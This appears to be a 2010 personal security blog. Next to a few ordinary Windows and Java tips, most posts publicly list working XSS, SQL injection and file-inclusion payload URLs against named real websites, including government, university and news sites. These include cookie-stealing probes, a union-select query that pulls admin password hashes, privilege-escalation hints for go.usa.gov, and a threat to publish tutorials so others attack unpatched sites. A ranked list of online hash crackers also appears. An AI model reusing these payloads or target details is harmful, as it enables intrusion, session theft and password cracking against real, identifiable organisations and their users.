Wednesday, 25 August 2010

use cygwin/cygnus applications/executables without re-installing everything

A Friend asked me how to use cygwin binaries (executables and/or dlls) standalone.
The procedure is very simple and actually worked for me with a lot of execs.

Install cygwin (if you don't have already the files that you need) and move your executable(s) and the related cygnus dlls that are necessary.
For sure you will need cygwin1.dll! (for anything)
Use dependency walker (application) to check for other needed files (suggested method) or just run awk and see the errors of the missing dlls. You shouldn't need to reinstall cygnus after moving awk and the dlls in the same folder.

Tuesday, 24 August 2010

Manually uninstall Adobe (ex Macromedia) Flash | cannot open links in internet explorer

I've lately had a problem with adobe flash (v. 10a?) on windows and I've tried to uninstall it with the uninstaller from adobe (without success).



The folder is
%windir%\system32\Macromed\Flash 


unregister the ocx
regsvr32 /u %windir%\system32\Macromed\Flash\flashVERSION.ocx
and delete the whole folder
%windir%\system32\Macromed\Flash


we can also (facultative) delete the data within this folder
%APPDATA%\Macromedia\Flash Player
 


-----------------------------
Some versions of Flash player 10 have several problems with Internet Explorer 8.
I've encountered the problem that I couldn't open/click the links from any textfield .... quite strange.

For the version 10i of flash I've solved by only reregistering the ocx


regsvr32 %windir%\system32\Macromed\Flash\flash10i.ocx
An easy thing to do ... but bothered me for more than 2 hours -.-

Thursday, 12 August 2010

OpenID Endpoints List

AOL - http://openid.aol.com/username
Blogspot - http://username.blogspot.com/
Certifi.ca - http://certifi.ca/username
Chimp - http://chi.mp/ (tested as specified by the site ... but not working ????)
Claimid - http://claimid.com/username
Facebook - ????
Flickr (yahoo) - http://flickr.com/username
Google - https://www.google.com/accounts/o8/id
Hyves - http://www.hyves.nl/
Identitude - https://username.identitu.de   (Outdated - Site is now for sale ... )
Linuxfeed (Myopenid) - https://openid.linuxfeed.org/
Livejournal - http:// username.livejournal.com
MyID - https://myid.net/ 
MyOpenID - https://myopenid.com/ 
Myspace - http://www.myspace.com/username
Myvidoop - http://username.myvidoop.com
MyDocomo - https://i.mydocomo.com
Steam - http://steamcommunity.com/openid/username
Technorati - http://technorati.com/people/technorati/username/
Tinyid (dead) - http://tinyid.us/username
Typepad - http://profile.typekey.com/username
Virgilio - http://www.myvirgilio.it | http://username.myvirgilio.it
Verisign - http://pip.verisignlabs.com/ 
Wordpress - http://username.wordpress.com
Yahoo - http://me.yahoo.com/

References: http://openiddirectory.com

Friday, 6 August 2010

Sign java application - solve the mixed signed code of pjirc

How to remove the boring mixed signed code in applets like pjirc (I've done this post for this specific one).


Tools needed java JDK  (just download it from the sun/oracle website).
http://www.oracle.com/technetwork/java/javase/downloads/index.html


I've used the same password ... it's not a good idea .... but who cares.

password keystore: pjircpjirc12345
key password: pjircpjirc12345


Remember to have the jdk binaries in the PATH
Go to the pjirc folder and rename the irc-unsigned.jar to irc.jar

Use those lines in a batch file. Modify them as much as you want.


-----batchfile.bat------
keytool -genkey -keyalg rsa -alias pjirc -dname "CN=Trueliar, OU=Somebody, O=SomeCompany, L=Somewhere, ST=Somewhere, C=IT" -storepass pjircpjirc12345 -keypass pjircpjirc12345
keytool -export -alias pjirc -file pjirc.crt -storepass pjircpjirc12345
jarsigner -storepass pjircpjirc12345 -keypass pjircpjirc12345 irc.jar pjirc
jarsigner -storepass pjircpjirc12345 -keypass pjircpjirc12345 pixx.jar pjirc
jarsigner -verify -verbose -certs pixx.jar

-----end of batchfile.bat------






Now you can use pjirc without having the 2nd boring message regarding the mixed signatures for the code.




-------------------------------------------------------------------------------


Some links that I've visited as reference

# keytool.exe and jarsigner.exe from the Sun Java Software Development Kit (version 1.4.2_06)

    web: java.sun.com/j2se/1.4.2/
    download: java.sun.com/j2se/1.4.2/download.html

# openssl.exe from the Win32 OpenSSL library (version 0.9.7e)

    web: http://www.openssl.org/
    download: www.openssl.org/related/binaries.html

# thawtecleaner.jar from Richard Dallaway

    web: www.dallaway.com/acad/webstart/
    download: www.dallaway.com/acad/webstart/thawtecleaner.jar

# signcode.exe from the Microsoft Authenticode Software Development Kit

    web: msdn.microsoft.com/workshop/security/authcode/intro_authenticode.asp
    download: download.microsoft.com/download/b/e/f/bef2551b-401d-4311-ab8f-13d3892b8154/codesigningx86.exe


http://www.pantaray.com/signcode.html
http://forum.pjirc.com/viewtopic.php?p=2832

Thursday, 27 May 2010

MSSql or MSSqhell?

I've spent a lot of time into (crappy)coding some converters from mysql to access (and viceversa) while in internet we have already such tools and those dbms have already some basic features to export the whole databases in an human readable and easy to use format.
I've found that the biggest problem is the lack of decent tools to export mssql.
Since I'm quite busy I've hoped to find an easy solution (tool) to export the all the databases of a mssql express server in a simple sql text file.
I know that I can use "osql" to do a backup but I needed a damn sql text file with the structure and the data just to modify by hand several things and to understand also different kinds of queries and then restore the database in an error-free manner.

After a whole day I've found only a single decent tool that have worked efficiently and it's
EMS MS SQL Manager Lite
The lite version is free and it's good for a basic administration of an express version of MSSql.

If you have a full version of MSSql (€€€ $$$) you can export in several formats the database(s) by using the administration tools. The problem is that you need to own a software

----
Other generic free tools for the administration of MSSql (express)

DbaMgr

DbaMgr2k
http://www.asql.biz/en/Download.aspx#DbaMgr

osql batch database extractor (doesn't work as expected)
http://www.rs-freeware.org/osql/#install

Java client (I don't have java installed on the server and I had not the time to upload the jre, so I don't know if it's a good tool or not.
http://squirrel-sql.sourceforge.net/
-------


Suggestions about other tools are welcome.

net time on windows??? I've never used it before ...

I've recently find out that there are some commands that are available since windows 2000 (afaik) but some references are pointing to the availability since windows 95 (http://www.computerhope.com/nethlp.htm).
I've never used them but they are quite useful sometimes when you need to to synch several computers in batch, expecially within an active directory.


UDP port 123 (SNTP) - TCP port 37 (TIME)

I've added the nearest server.
net time /setsntp:"ntp.prato.linux.it"
(we can add other servers separated by a space)


on linux i've always used this command
sntp -a ntp.prato.linux.it
to adjust the time from a server

and/or editing
/etc/ntp.conf
with the simple string
server ntp.prato.linux.it

Lists of the servers are available on ntp.org
I'm unable to use the ntp pools, they just timeout (?).

https://support.ntp.org/bin/view/Servers/StratumOneTimeServers
https://support.ntp.org/bin/view/Servers/StratumTwoTimeServers
 https://support.ntp.org/bin/view/Servers/NTPPoolServers
http://tf.nist.gov/tf-cgi/servers.cgi


I know that this post is useless but I publish it for myself to remember something that I forget each time.


Suggestions and more informations are welcome.

Wednesday, 26 May 2010

mirror of the old website of packetstuff.com

I've found the mirror of the old website of packetstuff.com
with all the tools using the PSSDK (WinPCap to PSSDK migration module).
Some links are dead and there are too many banners but generally it should work.

http://packetstuff.interfree.it/

Friday, 21 May 2010

http://www.mfa.gov.ir | XSS

Simple XSS

http://www.mfa.gov.ir/cms/cms/simple_search.jsp
(in the form)
<script>alert(document.cookie);</script>

Thursday, 20 May 2010

rockol.it XSS

rockol.it XSS

the xss starts with a mouse over the link
http://www.rockol.it/search.php?s=Alessandra%20Amoroso%202010%3Cdollo'%20onmouseover='alert(1);'%20title='

Wednesday, 19 May 2010

Various tools that I've archived long time ago

A collection of various free tools and books that I've archived long time ago.

I've made several changes and I cannot mantain this collection updated each time.
http://websec.interfree.it 

Monday, 17 May 2010

gay.tv | XSS

gay.tv xss

XSS (simple)
-
(old and ... *fixed*)
http://www.gay.tv/aggregato.jsp?string=<script>alert(1);</script>&x=0&y=0

(new XSS)
----
http://www.gay.tv/search/?123%3Cscript%3Ealert%281%29;%3C/script%3E

Thursday, 13 May 2010

http://www.murrayky.gov | Sql injection

Sql Injection (id)
http://www.murrayky.gov/showevent.htm?ID='

-error-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---


http://www.murrayky.gov/showevent.htm?ID=123+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16%20from%20information_schema.tables--

http://www.mssti.com/

abbcode.php problem

/home/mssti/public_html/phpbb3/

Wednesday, 12 May 2010

A list of useful crowdsourcing websites

 
-----------------
Reference/Source for the websites
("CrunchBase is the free database of technology companies, people, and investors")
-
 
----
The CrowdSpirit platform proposes a new model based on crowdsourcing that enables businesses to involve innovators from outside the company directly in the design of innovative products and services
----
----
----
----
----
----
----
crowdsourcing - movies
----
----
----
----
----
----
----
----
----
----

http://tweetmeme.com | XSS

while subscribing to utest.com i've found this simple xss on twetmeme.com (a service that they use to tweet ... I suppose).
funny .... ?

XSS ( no checks/sanitizing ... nothing)
http://tweetmeme.com/popup/option?url_id=984607153&source=utest&service=bit.ly.%22>%3Cvideo src=1 onerror=alert(document.cookie) >

http://tweetmeme.com/popup/option?url_id=984607153&source=utest%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&service=bit.ly

http://tweetmeme.com/popup/option?url_id=984607153%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&source=utest&service=bit.ly

redirecting anywhere
http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=135&nurl=http://www.google.com

spammy
http://blog.tweetmeme.com/?s=.&feed=Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc sit amet elit turpis. Cras elementum, turpis quis rutrum viverra, dui sapien auctor lorem, sed suscipit dui odio eget ligula. Nunc a sem mauris, a porta tortor. Nunc in varius justo. Praesent venenatis ultrices condimentum. Morbi eget imperdiet ante. Praesent eros metus, pulvinar nec laoreet a, aliquam nec orci. Nunc cursus condimentum lacus, at dictum sapien tincidunt non. Nullam gravida condimentum leo, id porta nibh placerat sit amet. Phasellus sed elit vel quam ornare laoreet.

Monday, 10 May 2010

www.interno.it | XSS

various characters are replaced but the xss is still possible and we can redirect the user where we want to.
The xss is triggered by the onmouseover on the available images.

In this case we send the user to google.

XSS

http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/index.html?month=5%22%20onmouseover=%22location.href='http://www.google.com';


same problem in other pages of the website
http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/9.html?month=5%22%20onmouseover=%22location.href=%27http://www.google.com%27


Note: we can also change the stylesheet and do other things.This is just a sample.

New Version of mdcrackgui

"A simple GUI for the mdcrack application. -MDCrack is a free featureful password cracker designed to bruteforce 21 algorithms: MD2, MD4, MD5, HMAC-MD4, HMAC-MD5, FreeBSD, Apache, NTLMv1, IOS and PIX (both enable and user) hashes"

List of the supported algorithms
MD2, MD4, MD5, MD5MD5, MD4MD4, MD4MD4S, MD5MD5S, HMAC-MD4, HMAC-MD5,IPB2, PHP, PHPS, FREEBSD, NTLM1, PIX, PIX-U, IOS, APACHE, CRC32, CRC32-B, ADLER32

The output/error redirection of the console to a textbox is still not fully working. You can still use the console (as default).

https://sourceforge.net/project/mdcrackgui

New version of Firefox Portable WebTools

New version of  Firefox Portable WebTools

"a Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc"


The changes
Added Theme Sky+
Added Groundspeed Addon
No-Script Updated
.net addon updated
Added a long list of (my) bookmarks. Initial sorting and organization.
Added a batch file to clean a bit of useless data


https://sourceforge.net/projects/firefoxwebtools


In the next  version
Added FireGPG (still under testing not yet portable)
Cleaning for FireGPG (to check if we want to remove the keys )
Firebug Updated
Access Me Updated
SQL Inject Me Updated
XSS Me Updated
Wappalyzer Updated

Probably I will add an intermediate releas with only the regular updates of the addons.

Sunday, 9 May 2010

casapounditalia.org | SQL Injection in joomla

 Sample POST (joomla bug - google for it)
http://www.casapounditalia.org:80/index.php?option=com_content&view=%2527&id=35&Itemid=60
id=35&sectionid=6&task=category&filter_order=a%2Edates

----

Warning: Invalid argument supplied for foreach() in /home/casapoundi/domains/casapounditalia.org/public_html/components/com_content/models/category.php on line 337

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/casapoundi/domains/casapounditalia.org/public_html/libraries/joomla/database/database/mysql.php on line 344

Chi Siamo

Friday, 7 May 2010

kisskiss.it | XSS

XSS (nick)
http://www.kisskiss.it/Eventi?s=1&nick=nickname<script>alert(1);</script>&profilo=4558b8be-57ba-11df-8fc9-9dcf6b19122e

 -
http://www.kisskiss.it/OnAir?radio=%3Cscript%3Ealert(document.cookie);%3C/script%3Esroldasrock

Wednesday, 5 May 2010

A list of chat, live chat scripts

A list of chat, live chat scripts.

https://sourceforge.net/projects/webberchat/
https://sourceforge.net/projects/icsc/
https://sourceforge.net/projects/ajax-chat/
https://sourceforge.net/projects/cconnect/
https://sourceforge.net/projects/phpchatter/
http://www.craftysyntax.com/
http://code.google.com/p/php-lively/
http://mibew.org/
http://www.reallinkchat.com/
http://www.helpcenterlive.com/
http://www.chattist.com/

Under testing

Tuesday, 4 May 2010

vark.com | XSS

Vark.com has been lately acquired by google.

 this xss seems to be useless (theorically harmless).



just add for a new topic

<img src=1 onerror=alert(document.cookie)>


-------------

For the second XSS




do the same
<img src=1 onerror=alert(document.cookie)>
adding a topic to one of your friends

---------------------------------
For the third XSS add the XSS payload

<img src=1 onerror=alert(document.cookie)>
in the activities of your profile and when vark.com will load them (after registration, in the share area)
you will see it working.
This will work only one time.

-----------

All those XSSs are useless in theory.

metranslate

I've added on sourceforge a very old vb.net application.
It's really crappy and outdated but it should work and can still be used for the latest language files of Mailenable.


https://sourceforge.net/projects/metranslate/
A standalone application that helps into translating language files of the mailenable application (Mail Server for Microsoft Windows).
Mailenable website http://www.mailenable.com/ 
Thi is an alternative to the MELangTranslator.exe for mailenable.

Facebook Application ..... partial XSS ...

Facebook Application XSS
(basicly you can load also any image to the user ex. the google logo)

http://apps.facebook.com/funny_pho_to_widget/?shared=



I'm not able to inject other js functions (that are encoded or removed) ... so I'm a bit stuck with the fact that I cannot use the cookies.
I will add more informations if I can do something different from a stupid and useless alert.

FirefoxPortableWebTools 0.0.0.4

A new version of Firefox Web Tools is available for the download
https://sourceforge.net/projects/firefoxwebtools/

"A Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc"


-Changelog-

FirefoxPortableWebTools-0.0.0.4
Added Theme Sky+
Added Groundspeed Addon
No-Script Updated
.net addon updated
Added a long list of (my) bookmarks. Initial sorting and organization.
Added a batch file to clean a bit of useless data

Read the respective licenses of mozilla firefox and all the addons!


Maybe I'm the only person that is using it :)
Anyway .... it's free.

Monday, 3 May 2010

http://search.mit.edu/ - http://sap.mit.edu | XSS

simple XSS in the search form
http://sap.mit.edu/information/search/

"><script>alert(document.cookie);</script><"
---

xss
-
http://search.mit.edu/search?q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&btnG=Go&site=mit&client=mit&proxystylesheet=http%3A%2F%2Fweb.mit.edu%2Fcre%2Fc%2Fgoogle-crestyles-v4.xsl&output=xml_no_dtd&as_dt=i&as_sitesearch=http%3A%2F%2Fweb.mit.edu%2Fcre&proxyreload=1

www.slac.stanford.edu | XSS

http://www.slac.stanford.edu/spires/find/jobs/wwwbrief?FIELD=&REGION=&RANK=&cc=&SEQUENCE=da%28d%29&abs=%22%3E%3Cvideo+src%3D1+onerror%3Dalert%28document.cookie%29%3E

comune.trento.it | SQL Injection

SQL Injection jsp->DB2.

(this works after a few post requests)
http://webapps.comune.trento.it/statistiche_elettorali/StatisticheLista.do?arkRifMan=1272909259708,1272909305354&pager.order_by=WKVOVA0'8

javax.servlet.jsp.JspException: ServletException in '/framework/statistiche_lista.jsp': Errore DB :Errore SQL file : ETWKXXF1 [SQL0010] Inizio costante stringa '8, WKVOV' non delimitato.

www.israelnationalnews.com | XSS

XSS
http://www.israelnationalnews.com/Subscribe/?email=dasewqr%40dasa.com%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E&subscribe_submit=Join

www.sviluppoeconomico.gov.it | XSS - Blind SQL Injection - LFI - System Compromise

http://www.sviluppoeconomico.gov.it/primopiano/dettaglio_primopiano.php?sezione=primopiano&tema_dir=../index.php&id_primopiano=87
Warning: require(../../index.php\0\0/navigazione/right_menu.php) [function.require]: failed to open stream: No such file or directory in /var/www/sitomap/primopiano/dettaglio_primopiano.php on line 25


sample sql inj.
http://www.sviluppoeconomico.gov.it/organigramma/elenco_dossier.php?sezione=organigramma&tema_dir=tema2&gruppo=5%20group%20by%201

-
Fatal error: Call to a member function Fields() on a non-object in /var/www/sitomap/class/lista_dossier.php on line 45
-

http://www.vigilfuoco.it | XSS - SQL Injection

Full of xss and sql injections. Access to 2 dbms. Possible system compromise.  (main language asp)

----------------------------------------------OLD deadlinks/fixed -------------------------------
XSS
http://www.vigilfuoco.it/emailCert/default.asp (form)
"><script>alert(document.cookie);</script><"



http://prevenzioneonline.vigilfuoco.it/VVF/HttpAdapter?CMD=loginDebole&forward=consultazioneMultiplaHandler&codFun=2&action_btn=loginInSessione&nomeServizio=Consultazione%3Cscript%3Ealert(document.cookie);%3C/script%3E


SQL Injections

The first with an oracle error
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?menu=52'

-------------------------------------------------------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare

/includes/menu.asp, line 44
--------------------------------------------------------





This one is related to
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?cboPeriodo=%3Casso4&btnNome1=Vai

-------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id_periodo = <asso4'.

/informazioni/norme_attivita_istituzionali/indice_cronologico.asp, line 72
-------

http://www.vigilfuoco.it/notiziario/archivio.asp (form)
---------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare

/notiziario/archivio.asp, line 378
--------




http://www.vigilfuoco.it/informazioni/uffici_territorio/direzioni.asp?reg=7
----------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Virgoletta di chiusura mancante prima della stringa di caratteri ''.

/informazioni/uffici_territorio/direzioni.asp, line 225
----------------------------
-------------------------------------------------------------------------------------------------------

--------------------------NEW---------------------------------------------
Oracle DB Sql Injection

http://www.vigilfuoco.it/informazioni/uffici_territorio/GestioneSiti/homepageTemplate.asp?s=361{SQL INJECTION HERE}&p=1041

http://www.vigilfuoco.it/sitiVVF/vercelli/notizia.aspx?codnews=12908&s=361{SQL INJECTION HERE}

http://www.vigilfuoco.it/sitiVVF/vercelli/uffici.aspx?s=361{SQL INJECTION HERE}&p=1044{SQL INJECTION HERE}


Friday, 30 April 2010

vatican.va | XSS - SQL injection - system compromise

Yes, it could be done.
More informations soon on this blog. (remember ... no defacements, no data retrieval, no bad things)


Meanwhile I've found this simple xss (put an xss in any text box)

http://asv.vatican.va/cercait/index.php?advanced=1
 "><video src=1 onerror=alert(document.cookie)>

Anyway, I'm playing on something else that is more interesting.

http://www.gossipnews.it | xss

xss in quite all the pages

--------------------------OLD-----------------------
http://www.gossipnews.it/cinema/vedifoto.php?id=3cbd57ad5223375ca2a5089283966818&num=19%3Cscript%3Ealert(document.cookie);%3C/script%3E&

http://www.gossipnews.it/musica/gli_zero_assoluto_fotorw.html?id=5ccabcbfb5861ba35a6b271c76a5ade0&num=5%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22

any location - http header injection
http://www.gossipnews.it/open/www/delivery/ck.php?oaparams=2__bannerid=537__zoneid=50__cb=1812239d6e__oadest=http%3A%2F%2Fwww.google.com
--------------------------------------NEW -------------------------------
http://www.gossip.it/news/monografia.php?keyword=ssasdadas"><script>alert(1);</script>

teletu.it | XSS

http://supporto.teletu.it/cerca/?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&search=1

any xss in the forms
http://www.teletu.it/teletu/nuova-linea.php
http://www.teletu.it/tuttocompreso/offerte/tutto-per-te.php

webnews.it | xss

http://cerca.webnews.it/w.sl?us=fs&q=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22&t=webnews&cat=

cia.gov | XSS

The <> tags are not allowed but the "= can be injected so we can add to the  <input> tag a style to enlarge the area and an onmouseover so that a javascript will be fired when the mouse pass over the (enlarged) text input.
We can do also other things but this should be enough.

https://www.cia.gov/search?q=%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie)


Screenshot

www.adnkronos.com | XSS - Local file inclusion (php)

XSS

modifies the script within the setTimeout (works after 300000 ms)
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie+'
http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie);",1);setTimeout("alert('

Local File Inclusion
the same problem is identical in several parts of the website even if blind (no error in the output).
http://www.adnkronos.com/IGN/Zoom/?id=

sample error (added a ' )
Warning: include(news/3.0.4217592951\'.inc.php) [function.include]: failed to open stream: No such file or directory in /opt/apache2/www60/IGN/Zoom/index.php on line 11

Warning: include() [function.include]: Failed opening 'news/3.0.4217592951\'.inc.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /opt/apache2/www60/IGN/Zoom/index.php on line 11

The error doesn't always appear. Probably the response is from different servers and only one of those is  showing the errors to the output. I'm not really sure and I'm not doing any further testing (files are included and executed for sure).

www.opensourcecms.com www.tradepub.com | several XSS

Several XSS all over the website (more than the listed).


samples (xss after the id or the page will redirect)

http://php.opensourcecms.com/scripts/details.php?scriptid=339%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cval=&name=Mac's%20CMS

http://php.opensourcecms.com/scripts/show.php?catid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&cat=CMS%20/%20Portals

http://php.opensourcecms.com/news/index.php?page=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&sortby=dateasc

http://php.opensourcecms.com/scripts/details.php?scriptid=19%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&name=e107
 
 sample on tradepub.com closing the comment in the html
http://php-opensourcecms.tradepub.com/?pt=cat&page=Cons--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!-- 




there are several other.

Thursday, 29 April 2010

Portable Oracle EX - Help needed

I'm working on a Portable version of Oracle EX (server) for windows. The NSIS and all the relevant files will be released as open source (no specific license will be used).
I will share without problems the gathered data. The list of the binary files, the registry files (.reg) etc.
Actually I'm still collecting the registry modifications that are a lot, especially for the registered components.
There are also modifications to the group policies made by the installer of oracle, I've only seen them but I still don't know how much time they will require.
The oracle odbc installation is half working.
Obviously the final version will not include the oracle's binary files.

I've a static version, with fixed paths,
If someone is interested into helping me please leave a comment.

lostregone.net | XSS, file inclusion

Even if with some server side checks the XSS passed.

http://www.lostregone.net/index.php?words=<video src=1 onerror=alert(String.fromCharCode(112,97,115,115,101,100))>&where=1&go=Vai!&rate=5&id=5062&cal_month=Apr&cal_year=2010&submitted=true&address=Indirizzo+E-mail&action=add

Remote File Inclusion (the script is liga manager online)
http://www.lostregone.net/GSC/gsc.php?action=table&tabtype=0&file=..

www.ilsannioquotidiano.it | XSS Sql Injection

Any old phpnuke bug. There's no fun.

XSS
http://www.ilsannioquotidiano.it/sections.php?op=printpage&artid=1%3Cscript%3Ealert(document.cookie);%3C/script%3E

old php-nuke sql injection
http://www.ilsannioquotidiano.it/sections.php?op=printpage&artid=-9999999/%3Cscript%3E**%20%20/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*

ilquaderno.it | XSS

http://www.ilquaderno.it/commenta-articolo.php?idart=46069%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://www.ilquaderno.it/qsearch.php?q=%3Cscript%3Ealert(1);%3C/script%3E

blind SQL Injection (in the above links). The site uses only addslashes or gpc_magic_quotes that can be bypassed.

http://search.usa.gov how funny is the title!

http://search.usa.gov/search?query=funny%3C/title%3E%3C/head%3E%3Cbody%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E%3C/body%3E%3C/html%3E%3C!--


http://search.usa.gov/search?query=funny</title></head><body><video src=1 onerror=alert(document.cookie)></body></html><!--


So the search is adding without problems anything in the title.
I've just added the remaining opening tags (</title></head><body>)of the page, the script that i want, the closing tags (</body></html>) and an opening  comment in the end ( <!-- ).
Quite funny anybody can create a phishing page on usa .gov or get the sessions of the users (If I've time I will explain it in a simulation with a video - don't fear the fact that you cannot have an account).

-----------------------------------------------------
If I have a bit of time I will finish and publish my thoughts about social engineering with a real example (this one?) and other methods to get more privileges.

Hints -
The usa.gov url shortner with drupal
http://go.usa.gov/shorturl/user/1  <- All the accounts are acconected and the usernames can be retrieved easily (this is normal ... by design)
http://go.usa.gov/robots.txt <- drupal with all the installation files. Only some folders and files are forbidden.
PHP  5.2.12 (read write on
They use the same methods as on drupa.ly.
-----------------------------------------------------

They don't reply to my emails ... and the problems of a previous post have never been patched expecially the remote code execution. Maybe if I post a tutorial a swarm of kids will start to play on their site.
The governments are slow as hell and never patch until someone try deface them (not me for sure) or someone else is asking them money for their "security" (not me also in this case ...).

What a mad world.



----------------------------------------------------------------
Blarg!!!!
Let me add a song to this boring and useless post that I'm forced to truncate.
Those words are explainig what I think right now.

****
...
And I find it kinda funny I find it kinda sad
The dreams in which I'm dying
Are the best I've ever had
I find it hard to tell you
I find it hard to take
When people run in circles
It's a very, very mad world mad world
...


Tuesday, 27 April 2010

Online hash Crackers and Generators with ratings

Personal ratings. Links taken from google.

-Online hash Generators-
http://www.insidepro.com/hashes.php?lang=eng | Quite any kind - Maybe the best around
http://nediam.com.mx/winhashes/search_nt_hash.php | NTLM/LM - excellent
http://funprogs.topcities.com/hashgen.htm | NTLM/LM - good



-Online hash Crackers-
http://www.md5cracker.tk/ | MD5 - excellent - search on several md5 crack websites
http://www.google.com | excellent - several websites have an md5 or sha1 hash in the title or the url
http://www.yahoo.com | excellent - several websites have an md5 or sha1 hash in the title or the url
http://md5.hashcracking.com | MD5 - excellent - ~50,529,455,839 predefined hashes
http://www.tobtu.com/md5.php | MD5 - excellent
http://www.c0llision.net/ | MD5/NTLM/LM - excellent - requests via irc with several hashes - irc.after-all.org #md5crack
http://nediam.com.mx/winhashes/search_nt_hash.php | NTLM/LM - excellent
http://md5.rednoize.com/ | MD5/SHA1 - excellent
http://www.cmd5.org/ | MD5/md5(md5($pass))/sha1/md4/mysql/mysql5/md5($pass.$salt)/md5($salt.$pass)/md5(md5($pass).$salt)/md5(md5($salt).$pass)/md5($salt.$pass.$salt)/md5($salt.md5($pass))/md5(md5($pass).md5($salt))/md5(md5($salt).md5($pass))/sha1($username.$pass) - good
http://md5.overclock.ch/ | MD5 - good - server irc.rizon.net #md5
http://tools.benramsey.com/md5/ | MD5 - good - reverse hash
http://www.thepanicroom.org/index.php?view=md5 | MD5 - good - search on several md5 crack websites
http://sec-war.com/md5.php | MD5 - good - search on several md5 crack websites
http://passcracking.com | MD5 - good - w/ fast queue
http://www.md5decrypter.co.uk/ | NTLM/MD5/SHA1 - good (w/ captcha) multiple hashes (8)
http://gdataonline.com | MD5 - good - w/ multiple hashes (5)
http://www.cloudcracker.net | MD5/SHA1 - good
http://opencrack.hashkiller.com | MD5 - good - downloadable wordlist
http://www.md5this.com/crack-it-/index.php | MD5 - good - predefined+cracking - captcha(not working with opera)
http://www.md5crack.com | MD5 - medium
http://md5.thekaine.de | MD5 - medium - meta search engine
http://milw0rm.com/cracker/ | MD5/LM - poor (you need to wait for the spots) - decent wordlist
http://stupidsite.org/cracker/md5_cracker.php | MD5 - poor - predefined hashes
http://www.netmd5crack.com/cracker/ | MD5 - poor - predefined hashes
http://md5decryption.com | MD5 - poor - predefined hashes
http://www.bigtrapeze.com/md5/ | MD5 - poor - not updated; few results
http://md5hack.com/ | MD5 - poor
http://www.macrosoftware.ro/md5/index.php | MD5 - poor
http://www.md5decrypter.com/ | MD5 - poor
http://www.md5encryption.com/ MD5 - poor
http://www.plain-text.info/ | MD5/LM/NTLM/MySQL v2.32/SHA1 - requests via irc - irc.rizon.net #rainbowcrack
http://www.hashchecker.com/index.php?_sls=add_hash | MD5 - Paid Service with 99,99% of results (?) - poor
http://md5.idiobase.de/ | MD5 - very poor
http://alimamed.pp.ru/md5/ | MD5 - poor
http://bokehman.com/cracker/ | MD5 - poor
http://www.schwett.com/md5/ | MD5 - poor
http://md5.allfact.info/ | MD5 - poor
http://www.mmkey.com/md5/home.php | MD5/SHA256/ - mostly useless
http://www.xmd5.org/ | MD5 - poor
http://www.tmto.org/ | MD5 - seems to be good - ~308,288,137,504 predefined hashes - not tested
http://www.tydal.nu/article/md5-crack/ | MD5 - not tested/not working
http://cracker.kalkulators.org | MD5/SHA1/SHA256/LM/NTLM - medium - meta search engine - nice looking interface

http://www.farefuturofondazione.it/ http://www.ffwebmagazine.it | XSS

Several XSS (no reason to list them all)

http://www.ffwebmagazine.it/ffw/page.asp?VisImg=S&Art=5592&Cat=1&I=e.gif%22 onerror="alert(document.cookie)" &IdTipo=0&TitoloBlocco=Attualit%C3%A0&Codi_Cate_Arti=24

http://www.ffwebmagazine.it/ffw/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&AlreadySelected=n&IdTipo=0&Codi_Cate_Arti=23&TitoloBlocco=Economia"></a><img src=1 onerror="alert(document.cookie)"><a href="&IdMenu=80&NomeMenu=Economia

http://www.ffwebmagazine.it/ffw/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&AlreadySelected=y&IdTipo=0&Codi_Cate_Arti=50&TitoloBlocco=%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E%3EIn%20Primo%20Piano

http://www.farefuturofondazione.it/ff/Page.asp?Cat=Archivio&Tipo=UltimeNotizie&ASL=y&IdTipo=0&CCA=43&TB=Pubblicazioni%3Cvideo%20src=1%20onerror=alert(document.cookie)%3E

